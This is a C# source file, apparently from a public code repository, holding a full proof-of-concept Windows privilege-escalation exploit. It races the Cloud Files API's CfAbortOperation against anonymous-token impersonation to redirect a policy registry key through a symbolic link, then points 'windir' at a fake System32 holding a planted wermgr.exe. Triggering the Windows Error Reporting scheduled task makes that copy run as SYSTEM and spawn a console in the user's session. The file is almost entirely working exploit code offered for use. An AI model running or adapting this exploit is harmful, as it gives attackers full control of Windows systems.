lainlives
/
NightmareEclipse


			
							123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369
							using Microsoft.Win32;
using Microsoft.Win32.TaskScheduler;
using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Security.Cryptography;
using System.Security.Permissions;
using System.Threading;

namespace PoC_AbortHydration_ArbitraryRegKey_EoP
{
    static class Program
    {
        static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
        {
            Console.WriteLine("Opening for {0}", desired_access);
            using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
            {
                using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
                {
                    if (key.IsSuccess)
                        return key.Result.Duplicate();
                }

                using (var imp = NtThread.Current.ImpersonateAnonymousToken())
                {
                    return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
                }
            }
        }

        static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
        {
            var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
            key.SetSecurityDescriptor(sd, info);
        }

        static void ForceKeyDeleteKey(NtKey root, string name)
        {
            Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
            using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
            {
                Console.WriteLine("Opened for WriteDac");
                SetSecurityDescriptor(key, SecurityInformation.Dacl);
            }

            using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
            {
                Console.WriteLine("Opened for WriteOwner");
                SetSecurityDescriptor(key, SecurityInformation.Label);
            }

            using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
            {
                Console.WriteLine("Opened for enumerate.");
                DeleteRegistryTree(new_key);
                new_key.Delete();
            }
        }

        static void DeleteRegistryTree(NtKey root)
        {
            foreach (var name in root.QueryKeys())
            {
                ForceKeyDeleteKey(root, name);
            }
        }

        [Flags]
        enum AbortHydrationFlags
        {
            None = 0,
            Unblock = 1,
            Block = 2,
        }

        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
        static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);


        [StructLayout(LayoutKind.Sequential)]
        struct CF_PLATFORM_INFO
        {
            public int BuildNumber;
            public int RevisionNumber;
            public int IntegrationNumber;
        }

        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
        static extern int CfGetPlatformInfo(
          out CF_PLATFORM_INFO PlatformVersion
        );

        static void ForceTokenThread(object obj)
        {
            try
            {
                using (var thread = (NtThread)obj)
                {
                    Console.WriteLine("In force token thread {0}", thread);
                    using (var token = TokenUtils.GetAnonymousToken())
                    {
                        while (true)
                        {
                            thread.SetImpersonationToken(token);
                            thread.SetImpersonationToken(null);
                        }
                    }
                }
            }
            catch(ThreadAbortException)
            {
                return;
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }

        const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
        static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
        static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
        const string TARGET_KEY = @"\Registry\User\.DEFAULT\Volatile Environment";

        static void CheckKeyThread(object root_key)
        {
            string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
            try
            {
                using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
                {
                    while (true)
                    {
                        if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
                        {
                            Console.WriteLine("Change detected.");
                            Environment.Exit(0);
                            break;
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }

        static int Check(this int hr)
        {
            if (hr < 0)
                Marshal.ThrowExceptionForHR(hr);
            return hr;
        }

        const int MAX_STAGE = 4;

        static void Stage0()
        {
            for (int i = 1; i < MAX_STAGE; ++i)
            {
                Win32ProcessConfig config = new Win32ProcessConfig
                {
                    CommandLine = $"run {i}",
                    ApplicationName = typeof(Program).Assembly.Location,
                    TerminateOnDispose = true
                };

                using (var p = Win32Process.CreateProcess(config))
                {
                    if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
                    {
                        throw new ArgumentException($"Failed to run stage {i}");
                    }
                }
            }
        }

        static void Stage1(bool root_key)
        {
            Thread check_key_th = new Thread(CheckKeyThread);
            check_key_th.IsBackground = true;
            check_key_th.Start(root_key);
            Thread.Sleep(1000);

            var th = NtThread.OpenCurrent();
            var anon_thread = new Thread(ForceTokenThread)
            {
                IsBackground = true
            };
            anon_thread.Start(th);

            while (true)
            {
                CfAbortOperation(NtProcess.Current.ProcessId,
                    IntPtr.Zero, AbortHydrationFlags.Block);
            }
        }

        static void Stage2()
        {
            using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
            {
                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
                DeleteRegistryTree(key);
            }

            NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
            Stage1(false);
        }

        static void Stage3()
        {
            using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
            {
                Console.WriteLine("Cleaning up link {0}", key.FullPath);
                key.Delete();
            }

            using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
            {
                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
            }
            var key2 = Registry.Users.OpenSubKey(@".DEFAULT\Volatile Environment", RegistryRights.FullControl);
            foreach(var subkey in key2.GetSubKeyNames())
            {
                var fullsubkey = TARGET_KEY + @"\" + subkey;
                Console.WriteLine("Cleaning up subkey {0}", fullsubkey);
                NtKey _subkey;
                try
                {
                    _subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.WriteDac);
                }
                catch (Exception ex)
                {
                    
                    _subkey = OpenKey(null, fullsubkey, KeyAccessRights.WriteDac);
                }
                SetSecurityDescriptor(_subkey, SecurityInformation.Dacl);
                _subkey.Close();
                _subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.Delete);
                _subkey.Delete();
                _subkey.Close();
            }
            
            key2.Close();
            using(NtKey ntarget = NtKey.Open(TARGET_KEY,null,KeyAccessRights.SetValue))
            {
                ntarget.SetValue("windir", Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName));
            }
            
            string fakesys32 = Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName) + @"\System32";
            Directory.CreateDirectory(fakesys32);
            string fakewer = fakesys32 + @"\wermgr.exe";
            File.Copy(Process.GetCurrentProcess().MainModule.FileName, fakewer, true);

            var srvnamedpipe = new NamedPipeServerStream("MiniPlasmaWERPipe");
            System.Threading.Tasks.Task pipewait = srvnamedpipe.WaitForConnectionAsync();

            using (TaskService tasksvc = new TaskService())
            {
                Task wertask = tasksvc.GetTask(@"\Microsoft\Windows\Windows Error Reporting\QueueReporting");
                wertask.Run();
                wertask.Dispose();
            }
            if(!pipewait.Wait(2000))
            {
                Console.WriteLine("Exploit failed.");
            }
            else
            {
                Console.WriteLine("Exploit succeeded.");
            }
            srvnamedpipe.Dispose();
            Thread.Sleep(1000);
            try
            {
                File.Delete(fakewer);
                Directory.Delete(fakesys32);
            }
            catch (Exception ex)
            { }
            using (NtKey ntarget = NtKey.Open(TARGET_KEY, null, KeyAccessRights.Delete))
            {
                ntarget.Delete(false);
            }

        }

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool GetNamedPipeServerSessionId(IntPtr Pipe, out UInt32 ClientProcessId);

        static void Main(string[] args)
        {
            bool isSystem;
            using (var identity = System.Security.Principal.WindowsIdentity.GetCurrent())
            {
                isSystem = identity.IsSystem;
            }
            if (isSystem)
            {
                Environment.SetEnvironmentVariable("windir", @"C:\Windows",EnvironmentVariableTarget.Process);
                var namedpipeclient = new NamedPipeClientStream("MiniPlasmaWERPipe");
                namedpipeclient.Connect();
                UInt32 nSesID;
                IntPtr hPipe = namedpipeclient.SafePipeHandle.DangerousGetHandle();
                if (!GetNamedPipeServerSessionId(hPipe, out nSesID))
                    return;
                namedpipeclient.Dispose();
                NtToken token = NtToken.OpenEffectiveToken();
                NtToken token2 = token.DuplicateToken();
                token.Dispose();
                token = token2;
                token.SetSessionId(((int)nSesID));
                Win32Process.CreateProcessAsUser(token, @"C:\Windows\System32\conhost.exe", "", CreateProcessFlags.None, null);
                return;

            }


            try
            {
                CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();

                if (args.Length <= 1)
                {
                    int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
                    switch (stage)
                    {
                        case 0:
                            Stage0();
                            break;
                        case 1:
                            Stage1(true);
                            break;
                        case 2:
                            Stage2();
                            break;
                        case 3:
                            Stage3();
                            break;
                        default:
                            throw new ArgumentException("Erm?");
                    }
                }
                else
                {
                    using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
                    {
                        using (var imp = token.Impersonate())
                        {
                            CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}